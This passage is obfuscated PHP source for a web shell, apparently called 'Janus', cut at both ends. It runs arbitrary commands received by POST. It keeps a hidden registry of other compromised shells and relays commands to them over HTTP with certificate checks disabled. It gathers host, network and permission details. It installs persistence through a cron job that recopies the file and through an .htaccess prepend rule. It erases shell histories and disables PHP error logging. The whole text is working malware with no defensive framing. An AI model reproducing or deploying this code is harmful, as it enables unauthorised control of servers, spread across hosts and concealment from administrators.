"\x73\x6f\x66\164\x77\x61\x72\x65")) { goto C4Z6t; } goto Yk3TH; YArQS: $DnOhI["\156\145\164\167\157\x72\x6b"] = ["\163\145\x72\166\x65\x72\137\x61\144\144\x72" => $_SERVER["\x53\105\122\x56\105\x52\x5f\101\104\104\x52"] ?? "\116\57\101", "\163\145\162\166\145\162\137\x6e\141\x6d\145" => $_SERVER["\123\x45\122\x56\105\x52\x5f\x4e\101\115\x45"] ?? "\116\x2f\x41", "\162\x65\155\x6f\x74\145\137\x61\144\144\x72" => $_SERVER["\122\105\x4d\x4f\124\105\137\101\104\x44\122"] ?? "\x4e\x2f\x41", "\x68\164\x74\x70\137\150\157\163\164" => $_SERVER["\x48\x54\124\x50\137\110\117\x53\x54"] ?? "\x4e\57\101"]; goto AW1JT; fNpO3: $DnOhI["\156\x65\164\x77\x6f\x72\153"]["\x69\156\164\x65\x72\146\x61\143\145\x73"] = array_merge($CSOr1 ?: [], $z4U2t ?: []); goto eo_nT; XJwcP: if (!($E8lIJ === "\x66\165\154\154" || $E8lIJ === "\160\x65\162\x6d\151\163\163\x69\157\x6e\163")) { goto Ooea1; } goto sExEV; KkpFZ: $DnOhI = []; goto gJnjf; ASfp7: fnHBn: goto I6NCb; sExEV: $DnOhI["\x70\x65\x72\155\x69\x73\163\x69\x6f\156\x73"] = ["\x63\x77\144\x5f\167\162\x69\x74\x61\142\154\x65" => is_writable(getcwd()), "\x74\155\160\137\x77\x72\x69\164\141\x62\154\x65" => is_writable(sys_get_temp_dir()), "\x64\151\163\x61\x62\x6c\x65\144\x5f\146\x75\156\143\164\151\157\x6e\x73" => $DqyA2, "\x6f\160\145\156\137\x62\141\x73\x65\x64\x69\162" => ini_get("\157\x70\x65\x6e\x5f\x62\x61\163\145\144\x69\x72"), "\x73\141\146\145\x5f\155\157\x64\x65" => ini_get("\163\x61\x66\145\137\155\157\144\145"), "\x61\x6c\154\x6f\x77\x5f\x75\x72\154\x5f\146\157\160\145\156" => ini_get("\x61\154\x6c\157\167\x5f\165\x72\154\x5f\x66\157\160\145\156"), "\141\154\x6c\157\x77\x5f\165\x72\154\x5f\151\156\143\154\165\x64\x65" => ini_get("\x61\154\x6c\x6f\167\137\x75\x72\x6c\x5f\151\x6e\x63\x6c\165\x64\x65")]; goto DoqfY; xo_b0: $DnOhI["\x73\171\163\x74\x65\155"] = ["\157\163" => php_uname("\163"), "\150\157\x73\x74\x6e\x61\x6d\x65" => gethostname(), "\153\145\162\156\x65\154" => php_uname("\x72"), "\141\x72\143\150\151\164\145\x63\164\x75\x72\x65" => php_uname("\155"), "\160\x6c\x61\x74\146\x6f\162\x6d" => php_uname("\x61"), "\x70\x68\x70\x5f\x76\x65\x72\163\151\x6f\x6e" => PHP_VERSION, "\163\141\x70\x69" => php_sapi_name(), "\165\163\145\x72" => get_current_user(), "\165\x69\x64" => getmyuid(), "\x67\x69\144" => getmygid()]; goto ASfp7; x8Wk8: zbdqp: goto k7N6e; pc18L: goto vbH70; goto FZRSU; FZRSU: case "\155\165\154\x74\x69\137\x73\x68\x65\x6c\x6c\x5f\162\x65\147\151\163\x74\x65\x72": goto mxC1j; Imcx_: @chmod($mBLAH, 0600); goto uu3Eh; AzFpL: NkKea: goto RUpav; VpnQg: $pjIBt = $_POST["\x72\x65\x6d\157\164\x65\x5f\x75\162\154"] ?? ''; goto wTSIf; FyWr8: $qY16M = __FILE__; goto xLtaW; uu3Eh: $v1Pog = ["\x73\x74\141\x74\x75\163" => "\163\x75\x63\x63\145\x73\163", "\x73\150\x65\x6c\x6c\x5f\151\144" => $Symt8, "\155\x65\x73\163\x61\x67\145" => "\x53\150\x65\154\x6c\x20\162\x65\147\151\163\164\x65\162\x65\144\40\163\165\143\143\x65\x73\x73\x66\x75\154\154\x79\56"]; goto jhzmR; yuXAv: $QqnG8 = []; goto htPFA; mxC1j: $qY16M = $_POST["\163\150\145\154\x6c\137\x70\x61\x74\150"] ?? ''; goto Qpy6H; Hxug2: if (!(empty($qY16M) && !$xhpni)) { goto ufmMw; } goto FyWr8; cYlCW: $QqnG8 = json_decode(@file_get_contents($mBLAH), true) ?: []; goto AzFpL; RUpav: $Symt8 = md5(($xhpni ? $pjIBt : $qY16M) . $ad2Q0); goto Aihtb; wTSIf: $xhpni = !empty($pjIBt); goto Hxug2; jhzmR: goto vbH70; goto OYm77; MyfiM: @file_put_contents($mBLAH, json_encode($QqnG8, JSON_PRETTY_PRINT)); goto Imcx_; Qpy6H: $ad2Q0 = $_POST["\163\x68\145\x6c\x6c\x5f\156\141\x6d\x65"] ?? ''; goto rymr1; rymr1: $zt4zR = $_POST["\163\x68\x65\154\x6c\137\x70\x61\163\x73\x77\157\x72\x64"] ?? ''; goto VpnQg; htPFA: if (!file_exists($mBLAH)) { goto NkKea; } goto cYlCW; Aihtb: $QqnG8[$Symt8] = ["\160\x61\x74\x68" => $qY16M, "\156\141\155\x65" => $ad2Q0 ?: ($xhpni ? basename(parse_url($pjIBt, PHP_URL_PATH)) : basename($qY16M)), "\160\141\x73\x73\167\x6f\x72\x64" => $zt4zR, "\162\x65\x6d\157\164\145\x5f\165\162\x6c" => $pjIBt, "\151\x73\x5f\x72\145\x6d\157\164\145" => $xhpni, "\162\x65\x67\151\x73\164\x65\162\145\144\x5f\x61\164" => time(), "\154\141\x73\x74\137\x73\x65\145\x6e" => time(), "\x73\164\x61\x74\x75\163" => "\x61\x63\164\x69\x76\145"]; goto MyfiM; FQdaj: $mBLAH = sys_get_temp_dir() . "\57\56\x6a\141\x6e\x75\163\x5f\163\150\145\x6c\x6c\137\162\x65\147\x69\163\x74\x72\x79\56\x6a\x73\x6f\156"; goto yuXAv; xLtaW: ufmMw: goto FQdaj; OYm77: case "\x6d\x75\x6c\164\151\x5f\163\150\145\x6c\x6c\137\x6c\x69\163\164": goto jws7V; sag0G: $NU1nE = md5(__FILE__); goto vDLjG; vDLjG: if (!isset($QqnG8[$NU1nE])) { goto pHCPO; } goto o54hJ; e7Oip: $QqnG8 = []; goto iPPmb; fDqyi: goto vbH70; goto vjpAA; wQCMN: $QqnG8 = json_decode(@file_get_contents($mBLAH), true) ?: []; goto kbRMp; pJ4bT: $QqnG8[$NU1nE]["\163\x74\x61\164\x75\163"] = file_exists(__FILE__) ? "\141\143\164\151\166\145" : "\151\156\x61\x63\164\x69\166\x65"; goto MrH67; FIUvM: pHCPO: goto XtTtG; iPPmb: if (!file_exists($mBLAH)) { goto cUaqi; } goto wQCMN; kbRMp: cUaqi: goto sag0G; jws7V: $mBLAH = sys_get_temp_dir() . "\x2f\x2e\x6a\141\156\x75\x73\x5f\x73\150\145\x6c\x6c\x5f\162\x65\x67\x69\x73\x74\x72\x79\56\152\163\157\156"; goto e7Oip; MrH67: @file_put_contents($mBLAH, json_encode($QqnG8, JSON_PRETTY_PRINT)); goto FIUvM; o54hJ: $QqnG8[$NU1nE]["\x6c\x61\163\x74\137\x73\145\145\x6e"] = time(); goto pJ4bT; XtTtG: $v1Pog = ["\x73\164\x61\x74\x75\x73" => "\163\x75\x63\x63\145\x73\x73", "\163\x68\145\x6c\x6c\163" => $QqnG8, "\x74\x6f\164\141\154" => count($QqnG8)]; goto fDqyi; vjpAA: case "\155\165\x6c\x74\x69\137\163\150\x65\154\154\x5f\x62\162\157\141\144\143\x61\x73\164": goto WXoU9; P7VlQ: if (!empty($azofS)) { goto M06_B; } goto DjRtc; y10ro: $mBLAH = sys_get_temp_dir() . "\x2f\56\x6a\141\156\165\x73\137\163\150\145\154\x6c\x5f\162\145\x67\x69\163\164\162\171\x2e\x6a\163\x6f\x6e"; goto P7VlQ; hkuu1: $QqnG8 = json_decode(@file_get_contents($mBLAH), true) ?: []; goto VN4wf; D3eIu: M06_B: goto uQBXf; gaB2y: goto vbH70; goto ZP5M1; cHBqR: foreach ($QqnG8 as $Symt8 => $Z_4pg) { goto khh8w; NZFsy: dEYHY: goto vpg8W; lCJvR: if (isset($http_response_header) && is_array($http_response_header)) { goto OyOOX; } goto awe0w; DiWq9: if (!file_exists($Z_4pg["\x70\141\164\x68"])) { goto XAu8_; } goto v15A9; ScE5Y: $MjGyc = false; goto YZ2Cc; hBoy7: if (function_exists("\155\x49\171\x62\163")) { goto sFn27; } goto HGakE; v15A9: $olRGv = @shell_exec($azofS . "\40\x32\x3e\x26\61"); goto GZFMt; awe0w: $KyZpx = 200; goto sYXPz; Ysfh5: yKOJf: goto IWx9j; DnDjD: VeyJZ: goto yQ53Y; yQjfT: $fEWHd = ["\141\x63\164\151\157\156" => "\162\x65\x6d\x6f\164\x65\x5f\x63\x6f\x6d\x6d\x61\156\144\x5f\145\170\x65\143", "\143\x6f\x6d\x6d\x61\x6e\144" => $azofS, "\163\150\145\x6c\154\x5f\x69\144" => $Symt8, "\160\x61\163\163\167\x6f\x72\144" => $Z_4pg["\x70\141\163\x73\x77\x6f\x72\144"] ?? '']; goto AejMg; h3I2I: XAu8_: goto i_13W; pGqeJ: goto ZB32J; goto x_n6b; x_n6b: CumdG: goto lCJvR; A1ESW: LEZYi($puVa9, [t5D5r => true, Jzs4E => $X5ufN, NNhCd => true, yylOA => 15, ts5wd => false, jokAg => false, iSR5k => ["\103\x6f\156\164\x65\156\x74\55\x54\x79\160\145\x3a\40\x61\160\160\154\x69\x63\x61\164\x69\157\x6e\57\170\55\x77\167\x77\55\x66\157\x72\155\x2d\165\162\x6c\x65\156\x63\157\x64\145\144", "\x55\163\x65\162\x2d\101\x67\x65\156\164\x3a\40\x4d\x6f\x7a\151\x6c\154\141\57\x35\x2e\x30\x20\50\x63\x6f\x6d\160\x61\164\x69\142\x6c\145\x3b\x20\x4a\141\x6e\165\x73\x2f\61\56\x30\51"]]); goto aajaQ; TeCm5: goto fCngh; goto bbiLh; i9oM3: if ($MjGyc !== false) { goto CumdG; } goto h6BFU; bbiLh: DD2da: goto kCBBw; VXoGT: $KyZpx = 0; goto pGqeJ; sYXPz: goto mPzrU; goto eX3mr; yQ53Y: $pjIBt = rtrim($Z_4pg["\x72\145\x6d\157\164\145\x5f\165\x72\x6c"], "\57"); goto g96VS; qTwKZ: $KyZpx = LS5s7($puVa9, tDRkT); goto QlGwB; Dufin: try { goto u9jaQ; CAV0c: n4wbr: goto eAUvJ; rDJCi: pXS1v: goto ku8wa; eAUvJ: $gSi8X[$Symt8] = ["\156\x61\x6d\x65" => $Z_4pg["\x6e\x61\x6d\x65"], "\x70\141\164\x68" => $Z_4pg["\x72\145\155\157\x74\x65\137\165\x72\x6c"], "\x72\x65\163\165\x6c\164" => $hAYa_["\x72\145\x73\x75\x6c\164"] ?? "\x4e\157\40\157\165\x74\x70\x75\x74", "\163\x75\x63\x63\x65\x73\x73" => isset($hAYa_["\x73\x75\x63\143\x65\163\x73"]) ? $hAYa_["\x73\165\x63\143\145\163\x73"] : true, "\151\163\x5f\x72\x65\x6d\157\164\145" => true]; goto rDJCi; u9jaQ: $AXEU0 = nz_aT($MjGyc); goto qTEIG; EWMVy: goto pXS1v; goto CAV0c; qTEIG: $hAYa_ = json_decode($AXEU0, true); goto heG66; heG66: if ($hAYa_ && isset($hAYa_["\x73\164\x61\x74\x75\163"]) && $hAYa_["\163\x74\x61\164\165\163"] === "\x73\x75\x63\x63\x65\x73\163") { goto n4wbr; } goto lMlvE; lMlvE: $gSi8X[$Symt8] = ["\x6e\x61\x6d\145" => $Z_4pg["\x6e\x61\x6d\x65"], "\x70\x61\164\150" => $Z_4pg["\x72\145\x6d\x6f\164\145\x5f\165\162\x6c"], "\162\x65\163\165\x6c\x74" => $hAYa_["\x6d\x65\x73\163\141\x67\145"] ?? "\125\x6e\153\x6e\x6f\x77\x6e\40\x65\162\x72\x6f\x72", "\163\165\143\x63\145\163\x73" => false, "\151\163\137\x72\x65\155\x6f\164\x65" => true]; goto EWMVy; ku8wa: } catch (Exception $smUM0) { $gSi8X[$Symt8] = ["\x6e\141\x6d\x65" => $Z_4pg["\156\141\x6d\145"], "\160\141\164\150" => $Z_4pg["\162\x65\x6d\x6f\x74\145\137\165\x72\154"], "\x72\x65\x73\165\x6c\164" => "\105\162\x72\157\162\x20\x64\145\x63\162\x79\x70\x74\x69\156\x67\x20\x72\x65\x73\x70\x6f\156\x73\x65\x3a\x20" . $smUM0->getMessage(), "\163\x75\x63\x63\145\x73\163" => false, "\x69\163\137\x72\145\155\x6f\164\x65" => true]; } goto Ysfh5; L7lRW: $puVa9 = mIYbS($sMOoi); goto A1ESW; QlGwB: $LntjT = zIYVN($puVa9); goto eKy_J; YZ2Cc: $KyZpx = 0; goto lR3bg; h6BFU: $LntjT = "\x46\x61\x69\x6c\145\x64\40\164\157\40\143\x6f\x6e\156\x65\x63\x74\x20\164\x6f\40\x72\x65\155\157\x74\145\40\x73\x68\145\154\x6c"; goto VXoGT; rcpNR: goto yKOJf; goto YUFPi; VznrU: if ($MjGyc !== false && ($KyZpx === 200 || $KyZpx === 0)) { goto hyxfd; } goto eEMSK; GZFMt: $gSi8X[$Symt8] = ["\156\141\155\x65" => $Z_4pg["\x6e\x61\x6d\145"], "\160\141\x74\150" => $Z_4pg["\x70\x61\164\x68"], "\162\145\x73\x75\x6c\x74" => $olRGv, "\x73\165\143\x63\x65\x73\163" => $olRGv !== null, "\x69\x73\x5f\x72\145\x6d\157\164\145" => false]; goto h3I2I; eX3mr: OyOOX: goto RMPaF; g96VS: $sMOoi = $pjIBt . (strpos($pjIBt, "\77") !== false ? "\46" : "\x3f") . "\152\141\x6e\x75\163\137\141\143\164\151\x6f\156\75\162\145\155\157\x74\x65\137\x65\170\x65\143"; goto yQjfT; i_13W: goto GczyG; goto DnDjD; AejMg: $X5ufN = http_build_query(["\x70" => qL60P(json_encode($fEWHd))]); goto ScE5Y; v7h2n: goto tS6zP; goto WOuKs; YUFPi: hyxfd: goto Dufin; khh8w: if (!($Z_4pg["\x73\x74\141\x74\165\163"] !== "\x61\x63\x74\x69\166\x65")) { goto DD2da; } goto TeCm5; IWx9j: GczyG: goto voRHx; lR3bg: $LntjT = ''; goto hBoy7; RssR_: $yr3s9 = stream_context_create($xd_Oi); goto nXsb8; HGakE: $xd_Oi = ["\150\164\164\x70" => ["\x6d\145\164\150\157\x64" => "\x50\x4f\123\124", "\x68\145\141\144\145\162" => ["\x43\x6f\156\x74\145\156\x74\55\124\171\x70\x65\72\40\141\160\x70\x6c\151\143\x61\x74\x69\157\x6e\x2f\x78\x2d\167\x77\167\x2d\x66\157\x72\155\55\x75\162\154\x65\x6e\x63\157\144\x65\144", "\x55\163\x65\x72\55\101\x67\x65\x6e\x74\72\40\x4d\157\172\x69\154\154\141\57\65\x2e\60\40\50\143\157\x6d\x70\x61\164\151\x62\154\145\73\40\x4a\141\x6e\x75\163\57\61\x2e\60\51", "\x43\157\x6e\x74\x65\156\164\55\x4c\145\156\147\x74\150\72\x20" . strlen($X5ufN)], "\143\157\x6e\164\x65\x6e\164" => $X5ufN, "\x74\151\x6d\145\157\x75\164" => 15, "\151\x67\x6e\x6f\x72\145\137\x65\x72\162\157\162\163" => true], "\x73\163\x6c" => ["\x76\145\x72\x69\x66\171\x5f\x70\x65\145\162" => false, "\166\145\162\151\x66\171\x5f\x70\145\x65\162\137\x6e\x61\155\145" => false, "\x61\x6c\x6c\157\167\137\x73\x65\154\146\x5f\x73\x69\147\x6e\145\x64" => true]]; goto RssR_; voRHx: fCngh: goto pPdCh; kCBBw: if (!empty($Z_4pg["\151\163\x5f\162\145\155\157\x74\145"]) && !empty($Z_4pg["\x72\x65\155\x6f\x74\145\x5f\x75\x72\154"])) { goto VeyJZ; } goto DiWq9; nXsb8: $MjGyc = @file_get_contents($sMOoi, false, $yr3s9); goto i9oM3; aajaQ: $MjGyc = o397w($puVa9); goto qTwKZ; hijbb: tS6zP: goto VznrU; gVin6: ZB32J: goto v7h2n; WOuKs: sFn27: goto L7lRW; vpg8W: mPzrU: goto gVin6; RMPaF: foreach ($http_response_header as $r9AVH) { goto pk4dY; JznWo: goto dEYHY; goto S28K9; e3rdB: $KyZpx = (int) $I5WkF[1]; goto JznWo; pk4dY: if (!preg_match("\57\110\124\124\x50\134\57\x5c\144\134\x2e\134\144\134\163\x2b\50\x5c\x64\x2b\51\x2f", $r9AVH, $I5WkF)) { goto YJnrA; } goto e3rdB; S28K9: YJnrA: goto WAq66; WAq66: QYm7Q: goto GSUX3; GSUX3: } goto NZFsy; eKy_J: EbeN6($puVa9); goto hijbb; eEMSK: $gSi8X[$Symt8] = ["\x6e\141\155\x65" => $Z_4pg["\156\141\155\145"], "\x70\141\164\x68" => $Z_4pg["\x72\x65\155\157\x74\145\137\x75\162\154"], "\162\x65\163\165\154\x74" => "\x43\x6f\x6e\156\145\x63\x74\x69\157\x6e\x20\x66\x61\x69\x6c\x65\x64\72\40" . ($LntjT ?: "\110\x54\124\x50\x20" . $KyZpx), "\163\x75\143\x63\x65\163\x73" => false, "\x69\x73\x5f\x72\145\x6d\157\164\x65" => true]; goto rcpNR; pPdCh: } goto tQGFD; uQBXf: $QqnG8 = []; goto fQ1o6; KhaUp: $v1Pog = ["\x73\x74\x61\164\x75\163" => "\163\165\x63\x63\145\x73\x73", "\x72\145\x73\165\x6c\x74\x73" => $gSi8X, "\x74\157\164\141\154\137\x65\170\145\143\165\x74\x65\x64" => count($gSi8X)]; goto gaB2y; tQGFD: AqLd4: goto KhaUp; Gx0yL: $gSi8X = []; goto cHBqR; tpHwi: goto vbH70; goto D3eIu; fQ1o6: if (!file_exists($mBLAH)) { goto YP_Xe; } goto hkuu1; DjRtc: $v1Pog["\x6d\145\163\x73\141\x67\145"] = "\x43\157\155\x6d\141\156\144\x20\x69\x73\40\162\x65\161\165\x69\x72\145\144\x2e"; goto tpHwi; VN4wf: YP_Xe: goto Gx0yL; WXoU9: $azofS = $_POST["\143\157\x6d\155\x61\x6e\x64"] ?? ''; goto y10ro; ZP5M1: case "\x72\145\155\157\164\x65\x5f\x63\157\x6d\x6d\141\x6e\144\x5f\x65\x78\145\x63": goto Y7jXR; CYzYa: $olRGv = @shell_exec($azofS . "\40\x32\76\x26\x31"); goto cqJzT; pz3m5: if (!empty($azofS)) { goto ikchr; } goto pa2lm; Y7jXR: $azofS = $_POST["\143\157\155\155\x61\x6e\144"] ?? ''; goto CN0e2; rKqlL: $AXEU0 = Nz_AT($_POST["\x6a\141\x6e\x75\x73"]); goto i5FoC; wsXJ9: $IMtDv = $_POST["\x70\141\163\x73\167\x6f\x72\x64"] ?? ''; goto Sn5C3; hQwF4: $IMtDv = $siOBH["\160\141\163\x73\x77\157\162\144"] ?? $IMtDv; goto dB085; cqJzT: $v1Pog = ["\163\x74\141\164\165\163" => "\x73\x75\x63\x63\145\163\x73", "\162\x65\x73\165\x6c\x74" => $olRGv !== null ? $olRGv : "\x43\x6f\155\x6d\141\x6e\x64\x20\x65\x78\145\x63\x75\x74\151\x6f\x6e\x20\x66\141\x69\x6c\145\144", "\x73\x75\x63\x63\x65\x73\163" => $olRGv !== null, "\x73\x68\x65\x6c\154\x5f\151\144" => $Symt8]; goto gz75T; Sn5C3: if (!(empty($azofS) && isset($_POST["\x6a\141\156\x75\x73"]))) { goto dMNj7; } goto rKqlL; bgwBA: ikchr: goto CYzYa; CN0e2: $Symt8 = $_POST["\x73\150\x65\x6c\x6c\137\x69\144"] ?? ''; goto wsXJ9; aZmTy: $azofS = $siOBH["\143\x6f\155\x6d\x61\156\144"] ?? ''; goto szk0g; dB085: dMNj7: goto pz3m5; i5FoC: $siOBH = json_decode($AXEU0, true); goto aZmTy; pa2lm: $v1Pog["\x6d\x65\163\163\x61\x67\145"] = "\103\x6f\x6d\x6d\x61\156\144\x20\x69\x73\40\x72\x65\x71\165\x69\162\x65\144\56"; goto Jo6Ge; gz75T: goto vbH70; goto Dg_BU; szk0g: $Symt8 = $siOBH["\x73\x68\145\x6c\x6c\137\151\144"] ?? $Symt8; goto hQwF4; Jo6Ge: goto vbH70; goto bgwBA; Dg_BU: case "\x65\x6e\150\x61\x6e\143\x65\144\x5f\x70\145\x72\163\x69\x73\x74\145\x6e\x63\x65\x5f\x69\156\163\x74\141\x6c\x6c": goto xyEBV; L_seC: y_EJp: goto QFQYa; A_Bjx: $O3gQP = []; goto EbSAa; QFQYa: $kPaXz = []; goto A_Bjx; xyEBV: $q8yZ3 = $_POST["\x74\141\x72\x67\x65\164\137\x70\x61\164\150\163"] ?? ''; goto nEwsS; rcbJD: if (!empty($IhsOT)) { goto y_EJp; } goto SZveI; yTVt7: lMcYD: goto V7MYC; SZveI: $IhsOT = [__FILE__]; goto L_seC; MUAOg: goto vbH70; goto Dq6of; EbSAa: foreach ($IhsOT as $j3_hR) { goto zwD7i; nPSkN: m1wfQ: goto M4Lul; b96tn: $O3gQP[] = ["\160\141\164\x68" => $j3_hR, "\162\x65\x61\x73\157\x6e" => "\x46\151\154\x65\40\144\x6f\x65\163\40\156\x6f\164\x20\x65\170\x69\x73\164"]; goto hfMqp; VmUym: try { goto o3YTv; kYDcY: @exec("\x63\x72\157\156\x74\141\x62\x20\55\x6c\40\x32\x3e\x2f\x64\145\x76\x2f\156\165\x6c\x6c", $HOg6K); goto hDx3p; SQGaF: $sE6ux .= "\160\150\160\137\166\141\x6c\165\145\40\x61\x75\164\157\137\x70\x72\x65\160\145\156\144\x5f\x66\x69\154\145\x20\42{$j3_hR}\42\xa"; goto T7OpP; o3YTv: if ($qAgzP === "\x63\x72\x6f\156") { goto bjT4T; } goto Dunw0; Dunw0: if ($qAgzP === "\x68\164\x61\x63\x63\145\x73\163") { goto DozWX; } goto xjRwt; A1I9h: $dv18S = tempnam(sys_get_temp_dir(), "\143\x72\157\156\x5f"); goto kYDcY; pkAtS: $rE5PO = dirname($j3_hR) . "\x2f\x2e\150\x74\141\x63\143\x65\163\x73"; goto D7jLS; Y_7uY: CA1lq: goto UX0FN; NsR9U: $hRYw0 = "\x2a\x2f\x35\40\52\x20\52\x20\52\40\52\x20\x5b\40\55\146\40\x22{$j3_hR}\42\40\x5d\40\174\174\40\x63\x70\40\x22" . __FILE__ . "\x22\x20\x22{$j3_hR}\42\x20\x32\76\x2f\x64\x65\166\57\x6e\165\154\x6c"; goto A1I9h; WnoMO: goto CA1lq; goto gsyWH; TO2Lz: $sE6ux .= "\74\x46\151\154\x65\163\x4d\141\164\143\x68\x20\42\134\x2e\160\x68\160\x24\42\76\12"; goto SQGaF; Y9Cba: @file_put_contents($dv18S, $iySQk); goto juYdn; xjRwt: goto CA1lq; goto Lm5T5; D7jLS: $sE6ux = "\43\x20\112\141\x6e\165\163\x20\120\145\x72\163\x69\163\x74\x65\x6e\x63\x65\12"; goto TO2Lz; RCWqL: $kPaXz[] = ["\160\141\x74\x68" => $j3_hR, "\x6d\145\164\x68\x6f\144" => "\143\x72\x6f\156"]; goto WnoMO; KxAle: $kPaXz[] = ["\x70\x61\x74\150" => $j3_hR, "\155\145\x74\x68\157\x64" => "\150\x74\x61\143\143\x65\x73\x73"]; goto Y_7uY; GTb0Q: @unlink($dv18S); goto RCWqL; gsyWH: DozWX: goto pkAtS; hDx3p: $iySQk = implode("\12", $HOg6K) . "\12" . $hRYw0 . "\12"; goto Y9Cba; BKVV1: @file_put_contents($rE5PO, $sE6ux, FILE_APPEND); goto KxAle; T7OpP: $sE6ux .= "\74\57\106\151\x6c\145\163\x4d\141\x74\x63\x68\76\xa"; goto BKVV1; juYdn: @exec("\x63\162\x6f\x6e\164\141\142\40{$dv18S}\x20\62\x3e\57\x64\145\x76\57\156\165\154\154"); goto GTb0Q; Lm5T5: bjT4T: goto NsR9U; UX0FN: } catch (Exception $smUM0) { $O3gQP[] = ["\x70\141\x74\150" => $j3_hR, "\x72\x65\141\x73\x6f\x6e" => $smUM0->getMessage()]; } goto nPSkN; hfMqp: goto m1wfQ; goto MjppJ; zwD7i: if (file_exists($j3_hR)) { goto gqhqk; } goto b96tn; MjppJ: gqhqk: goto VmUym; M4Lul: } goto yTVt7; pi6dM: $IhsOT = array_filter(array_map("\164\162\151\x6d", explode("\xa", $q8yZ3))); goto rcbJD; V7MYC: $v1Pog = ["\x73\x74\141\x74\165\163" => "\x73\165\x63\x63\x65\x73\x73", "\x69\156\x73\164\x61\154\x6c\145\x64" => $kPaXz, "\146\141\151\154\x65\144" => $O3gQP]; goto MUAOg; nEwsS: $qAgzP = $_POST["\x70\x65\x72\x73\151\x73\164\145\x6e\x63\145\137\x74\171\160\145"] ?? "\143\162\157\156"; goto pi6dM; Dq6of: case "\x73\x74\145\141\x6c\x74\x68\137\x70\x72\157\x63\145\163\x73\x5f\150\x69\144\145": goto fczmq; ZHuBx: $v1Pog = ["\163\164\141\164\x75\163" => "\151\156\146\x6f", "\155\145\163\x73\141\147\145" => "\120\162\x6f\143\x65\163\163\40\150\x69\x64\151\x6e\x67\40\x72\145\x71\165\151\162\145\x73\x20\162\157\x6f\x74\40\160\162\151\166\151\x6c\x65\x67\145\x73\56\x20\103\165\162\x72\145\x6e\x74\x20\x50\x49\104\x3a\40" . $R0VUu, "\x70\151\144" => $R0VUu]; goto QNd3B; fczmq: $R0VUu = $_POST["\160\151\x64"] ?? getmypid(); goto ZHuBx; QNd3B: goto vbH70; goto X0kJh; X0kJh: case "\x73\164\145\141\x6c\x74\150\x5f\x6c\x6f\x67\137\x65\166\x61\x73\x69\157\x6e": goto UycIp; RF66U: UTv0E: goto RSs0Y; O0MuF: @ini_set("\x64\x69\x73\160\x6c\141\171\x5f\145\x72\162\157\x72\x73", 0); goto vLyz8; UycIp: $YMx03 = $_POST["\x65\166\x61\163\x69\157\x6e\137\x74\171\160\x65"] ?? "\141\154\x6c"; goto M7coe; dFwci: $S0VlV = [getenv("\110\117\x4d\x45") . "\57\x2e\x62\141\163\150\x5f\x68\x69\163\164\157\162\171", getenv("\110\x4f\115\x45") . "\x2f\56\x7a\163\150\137\x68\x69\163\164\157\x72\171", "\57\162\x6f\x6f\x74\x2f\56\x62\141\163\150\x5f\150\151\163\164\x6f\162\171"]; goto LSSO_; yhYXG: if (!($YMx03 === "\x61\154\154" || $YMx03 === "\x63\154\145\x61\x72\x5f\150\x69\x73\164\157\x72\171")) { goto UTv0E; } goto dFwci; vLyz8: $eK1Kn[] = "\104\151\x73\141\x62\154\x65\144\40\x50\x48\x50\x20\x65\x72\x72\157\x72\40\x6c\x6f\147\x67\151\x6e\147"; goto wTxgq; RSs0Y: $v1Pog = ["\163\x74\x61\164\165\163" => "\x73\165\143\x63\x65\163\x73", "\141\143\x74\151\157\156\x73" => $eK1Kn]; goto BrYwE; svZXL: @ini_set("\154\157\147\x5f\145\162\x72\157\162\163", 0); goto O0MuF; BrYwE: goto vbH70; goto YQSwu; wTxgq: hL3qu: goto yhYXG; M7coe: $eK1Kn = []; goto gPUIf; gPUIf: if (!($YMx03 === "\141\x6c\x6c" || $YMx03 === "\x64\151\x73\x61\142\154\x65\x5f\154\157\x67\147\151\x6e\147")) { goto hL3qu; } goto svZXL; pp7B9: d3uey: goto RF66U; LSSO_: foreach ($S0VlV as $FPyH4) { goto MwfmN; jMzXg: pLSvk: goto cKmXW; C4PiM: $eK1Kn[] = "\x43\154\145\141\162\145\x64\x3a\40{$FPyH4}"; goto jMzXg; MwfmN: if (!(file_exists($FPyH4) && is_writable($FPyH4))) { goto pLSvk; } goto WuG3m; cKmXW: VawTK: goto Kzjlp; WuG3m: @file_put_contents($FPyH4, ''); goto C4PiM; Kzjlp: } goto pp7B9; YQSwu: } goto G2UzY; bqXlN: if (isset($_GET["\x6a\x61\x6e\165\163\x5f\141\143\164\151\157\156"]) && $_GET["\152\x61\156\165\x73\x5f\x61\143\164\x69\x6f\x6e"] === "\x72\145\155\157\164\x65\x5f\145\170\145\x63") { goto SDVmw; } goto TmKLX; LIRkT: if (file_exists($zJsLG)) { goto DZfSO; } goto ZQB41; hEZ4X: $zqG9F = trim(@file_get_contents($fzeLt)); goto cSuWA; kjN9A: if (!isset($_GET["\152\x61\x6e\x75\x73\137\x74\x6f\x6b\145\x6e"]) || $_GET["\152\x61\x6e\165\163\137\x74\x6f\x6b\x65\x6e"] !== $zqG9F) { goto XE004; } goto d6MLE; qVu8Y: function poNRJ() { goto j2EgD; YudSc: $wqr2f = explode("\12", $UvbJl); goto EGeNd; q2q3R: $IClrU = $zKCl4 - $Kpftc; goto in_Oo; in_Oo: $BH606 = $gtF_9 > 0 ? 100 * ($gtF_9 - $IClrU) / $gtF_9 : 0; goto xDCAt; kNnsz: $gtF_9 = $LpfuD - $rVUeY; goto q2q3R; XxDI0: $LpfuD = array_sum($a9lN1); goto qtGGg; dOzfT: $rVUeY = array_sum($KWG1w); goto XxDI0; Ie6F4: sleep(1); goto og4JW; pq1PH: if (!($H8jmy === false)) { goto yrwyg; } goto MDaAt; fSgrI: if (!($UvbJl === false)) { goto SyJrj; } goto X3EsK; m5JC3: $UvbJl = @file_get_contents("\57\160\162\x6f\x63\57\x73\164\141\164"); goto fSgrI; X3EsK: return ["\165\163\x65\144\137\x70\x65\x72\143\145\x6e\x74" => -1]; goto NMCf9; qtGGg: $Kpftc = $KWG1w[3]; goto m2A8z; xB_Qp: return ["\165\163\145\x64\137\x70\145\162\143\x65\156\x74" => -1]; goto TV9CB; NMCf9: SyJrj: goto YudSc; xDCAt: return ["\x75\163\145\144\137\160\x65\162\x63\145\156\164" => round($BH606, 2)]; goto nlXtP; m2A8z: $zKCl4 = $a9lN1[3]; goto kNnsz; MDaAt: return ["\165\163\x65\x64\137\x70\x65\x72\x63\145\x6e\x74" => -1]; goto ckSgH; og4JW: $H8jmy = @file_get_contents("\57\160\162\x6f\143\57\163\x74\x61\x74"); goto pq1PH; ckSgH: yrwyg: goto qnD1R; z2zJH: $a9lN1 = explode("\40", 